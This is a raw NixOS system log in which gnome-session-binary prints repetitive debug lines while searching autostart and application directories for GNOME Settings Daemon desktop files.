machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.PrintNotifications.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.Power.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.PrintNotifications.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/applications'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking for file 'org.gnome.SettingsDaemon.Rfkill.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.config/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/nq2dcxajzzqkwydgix6wnc2m1yrl7kn4-desktops/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/var/nix/profiles/default/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/run/current-system/sw/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gsettings-schemas/gnome-shell-46.3.1/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/1ny0dv59ibh5h86gry1q1g72jn0bl0gh-gnome-shell-extensions-46.2/share/gsettings-schemas/gnome-shell-extensions-46.2/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/q9j6abi6igq18j6r83816ijh7iml18n6-gsettings-desktop-schemas-46.0/share/gsettings-schemas/gsettings-desktop-schemas-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/b0mia9q9d2cg6zkyhv7ra66nhcchsrws-gtk+3-3.24.43/share/gsettings-schemas/gtk+3-3.24.43/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: DEBUG(+): GsmUtil: found in XDG dirs: '/run/current-system/sw/etc/xdg/autostart/org.gnome.SettingsDaemon.PrintNotifications.desktop'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/xldb1ly8p10y60hndrs4f0day1a7wm3r-gnome-settings-daemon-46.0/share/gsettings-schemas/gnome-settings-daemon-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/cxdndshqwxg4qlawvxh5binmjf2vbpax-gnome-session-46.0/share/gsettings-schemas/gnome-session-46.0/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/store/zcibh66hfzjvldxam8zjl1glwlbfi2sr-gnome-shell-46.3.1/share/gnome/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.nix-profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/home/alice/.local/state/nix/profile/etc/xdg/autostart'
machine # Aug 02 11:49:35 machine gnome-session-binary[1076]: gnome-session-binary[1076]: DEBUG(+): GsmUtil: Looking in '/etc/profiles/per-user/alice/etc/xdg/autostart'
